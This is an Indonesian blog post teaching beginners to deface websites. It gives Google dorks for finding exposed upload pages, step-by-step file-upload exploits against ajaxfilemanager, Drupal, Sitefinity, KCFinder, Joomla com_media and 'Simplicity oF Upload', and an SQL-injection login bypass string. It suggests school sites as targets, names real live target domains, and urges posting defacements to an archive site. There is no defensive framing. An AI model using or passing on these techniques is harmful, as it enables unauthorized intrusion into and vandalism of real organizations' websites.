Cara deface untuk pemula


saya akan menjelaskan apa itu deface dan juga cara mendeface website..deface adalah suatu serangan peretasan terhadap sebuah website yang dilakukan oleh defacer dengan cara masuk ke system web tersebut lalu merubah tampilanya..tetapi beberapa teknik deface hanya sekedar menitipkan html/script ke server
Screenshot_2018-11-27-00-20-52Biasanya para defacer melakukan serangan untuk memberi pesan atau hanya sekedar test script..tapi sebelum anda malakukan deface anda harus paham tentang html dan juga istilah istilah dalam deface...berikut istilah dalam deface.
Biasanya para defacer melakukan serangan untuk memberi pesan atau hanya sekedar test script..tapi sebelum anda malakukan deface anda harus paham tentang html dan juga istilah istilah dalam deface...berikut istilah dalam deface.
1.Dork:dork adalah  pencarian web yang di lakukan dengan memasukan pencarian khusus contohnya inurl:file manager upload...
2.exploit:yaitu teknik untuk mencari kelemahan website dengan mengetikan beberapa perintah agar bisa di temukan tempat untuk upload shell seperti /sites/webfrom/html...
3.upload shell:upload html kamu
Oke...itu hanya beberapa istilah dalam deface..selanjutnya kalian perlu membuat script deface bisa html,txt atau bahkan gif...tergantung terhadap websitenya
Berikut beberapa cara deface yang paling sering di gunakan:
*Deface ajax file manager upload
Dork :
inurl:"ajaxfilemanager.php?page=" intitle:"ajax file manager" (kembangkan sendiri)
. Filenya harus .txt
Langkah Langkah :
1. Dorking dan pilih salah satu website nya
http://target.com/nymce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=51
2. Cari dan  klik tombol upload di pojok kanan atas.
3. Lalu upload file .File harus berekstensi .txt . Sebagai contoh, saya menguplaod filedengan nama script.txt
5. Jika sudah, klik file yang tadi  upload.. Akan terbuka link dimana file sobat berada. :) 
http://target.com/data/upload/script.txt

•deface bypass admin
Dork:inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
Kembangin lagi dorknya
1. Dorking ke google. Misal saya pake dork:
inurl:/administrator/login.php intext:admin login
2. Pilih website yang vuln
3lalu buka dan Isi username + pass dengan
'=''or'
4. Jika vuln, maka akan masuk ke Control Panel/Admin Panel web itu.
Jika login gagal, cari web yang lain  karena bukan jodoh:(
5. Dan jika berhasil login, terserah kalian mau diapain :) .
Catatan:deface bypas admin bisa di gunakan untuk deface web sekolah...menggunakan dork khusus
*
•Deface metode drupal
Adalah teknik deface paling gampang dan simple buat kalian para pemula...tapi metode ini hanya nitip file saja dan file tersebut biasanya akan di hapus dalam waktu kurang dari 24 jam
Dork :
allowed file type txt jpg html gif site:
allowed file types: png gif jpg txt site:gov
allowed file types: png gif jpg txt site:com
allowed file types: png gif jpg txt site:edu
( Site bisa di kembangin)
1. Dorking Dulu Di Google
2. Kalian Pilih Salah Satu Web & Klik Choose File

3. Pilih Script Deface Kalian Dan Klik Upload

Bonus cara deface lagi:v

1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search
7.selesai!!

Cara2

Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html

cara3

Deface Onion.to File Upload

Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut...

Dork : - inurl:/upload site:.onion.to
           - intext:"Upload" site:.onion.to


Step By Step :

1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => selesai

cara4
Metode com media
Bahan :

1. Dork : - inurl:com_media site:com
            - inurl:com_media intext:"Upload"

2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

3. Upload'an : Format .txt
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
                       contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id

cara5
[POC] Vulnerability Simplicity Of Upload

1:
Dork: “Powered By: © Simplicity oF Upload”
 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
3:allowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
4.:Untuk lihatnya http://[situstargetkamu]/upload/[Your File]



Komentar

Posting Komentar

Postingan Populer